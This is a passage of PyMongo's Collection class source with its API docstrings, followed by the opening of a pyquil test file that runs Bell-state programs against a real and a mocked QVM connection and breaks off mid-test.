.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document and a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
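    # Migration sketch (comments): a deprecated group() call and a roughly
    # equivalent aggregate() pipeline, assuming a Collection ``coll``:
    #
    #     coll.group(key=['a'], condition={'b': {'$gt': 0}},
    #                initial={'count': 0},
    #                reduce='function(cur, res) { res.count += 1; }')
    #
    #     coll.aggregate([{'$match': {'b': {'$gt': 0}}},
    #                     {'$group': {'_id': '$a', 'count': {'$sum': 1}}}])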
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
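    # Usage sketch (comments; assumes the client is authorized to run
    # renameCollection -- names are illustrative):
    #
    #     db.old_events.rename('events')
    #     db.staging.rename('events', dropTarget=True)   # replace an existing target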
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
          - `maxTimeMS` (int): The maximum amount of time to allow the
            distinct command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
        {u'_id': 665, u'done': False, u'count': 25}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
test_api.py
|
#!/usr/bin/python
##############################################################################
# Copyright 2016-2017 Rigetti Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import asyncio
import json
import os
import signal
import time
from math import pi
from multiprocessing import Process
from unittest.mock import patch
import networkx as nx
import numpy as np
import pytest
import requests_mock
from rpcq import Server
from rpcq.messages import (
BinaryExecutableRequest,
BinaryExecutableResponse,
)
from pyquil.api import QVMConnection, QPUCompiler, get_qc, QVMCompiler
from pyquil.api._base_connection import (
validate_noise_probabilities,
validate_qubit_list,
prepare_register_list,
)
from pyquil.device import ISA, NxDevice
from pyquil.gates import CNOT, H, MEASURE, PHASE, Z, RZ, RX, CZ
from pyquil.paulis import PauliTerm
from pyquil.quil import Program
from pyquil.quilbase import Halt, Declare
from pyquil.quilatom import MemoryReference
EMPTY_PROGRAM = Program()
BELL_STATE = Program(H(0), CNOT(0, 1))
BELL_STATE_MEASURE = Program(
Declare("ro", "BIT", 2),
H(0),
CNOT(0, 1),
MEASURE(0, MemoryReference("ro", 0)),
MEASURE(1, MemoryReference("ro", 1)),
)
COMPILED_BELL_STATE = Program(
[
RZ(pi / 2, 0),
RX(pi / 2, 0),
RZ(-pi / 2, 1),
RX(pi / 2, 1),
CZ(1, 0),
RZ(-pi / 2, 0),
RX(-pi / 2, 1),
RZ(pi / 2, 1),
Halt(),
]
)
DUMMY_ISA_DICT = {"1Q": {"0": {}, "1": {}}, "2Q": {"0-1": {}}}
DUMMY_ISA = ISA.from_dict(DUMMY_ISA_DICT)
COMPILED_BYTES_ARRAY = b"SUPER SECRET PACKAGE"
RB_ENCODED_REPLY = [[0, 0], [1, 1]]
RB_REPLY = [Program("H 0\nH 0\n"), Program("PHASE(pi/2) 0\nPHASE(pi/2) 0\n")]
def test_sync_run_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "multishot",
"addresses": {"ro": [0, 1]},
"trials": 2,
"compiled-quil": "DECLARE ro BIT[2]\nH 0\nCNOT 0 1\nMEASURE 0 ro[0]\nMEASURE 1 ro[1]\n",
"rng-seed": 52,
}
return '{"ro": [[0,0],[1,1]]}'
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run(BELL_STATE_MEASURE, [0, 1], trials=2) == [[0, 0], [1, 1]]
# Test no classical addresses
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run(BELL_STATE_MEASURE, trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
mock_qvm.run(EMPTY_PROGRAM)
def test_sync_run(qvm: QVMConnection):
assert qvm.run(BELL_STATE_MEASURE, [0, 1], trials=2) == [[0, 0], [1, 1]]
# Test range as well
assert qvm.run(BELL_STATE_MEASURE, range(2), trials=2) == [[0, 0], [1, 1]]
# Test numpy ints
assert qvm.run(BELL_STATE_MEASURE, np.arange(2), trials=2) == [[0, 0], [1, 1]]
# Test no classical addresses
assert qvm.run(BELL_STATE_MEASURE, trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
qvm.run(EMPTY_PROGRAM)
def test_sync_run_and_measure_mock(qvm: QVMConnection):
mock_qvm = qvm
mock_endpoint = mock_qvm.sync_endpoint
def mock_response(request, context):
assert json.loads(request.text) == {
"type": "multishot-measure",
"qubits": [0, 1],
"trials": 2,
"compiled-quil": "H 0\nCNOT 0 1\n",
"rng-seed": 52,
}
return "[[0,0],[1,1]]"
with requests_mock.Mocker() as m:
m.post(mock_endpoint + "/qvm", text=mock_response)
assert mock_qvm.run_and_measure(BELL_STATE, [0, 1], trials=2) == [[0, 0], [1, 1]]
with pytest.raises(ValueError):
mock_qvm.run_and_measure(EMPTY_PROGRAM, [0])
def test_sync_run_and_measure(qvm):
assert qvm.run_and_measure(BELL_STATE, [0, 1], trials=2) == [[1, 1], [0, 0]]
assert qvm.run_and_measure(BELL_STATE, [0, 1]) == [[1, 1]]
with pytest.raises(ValueError):
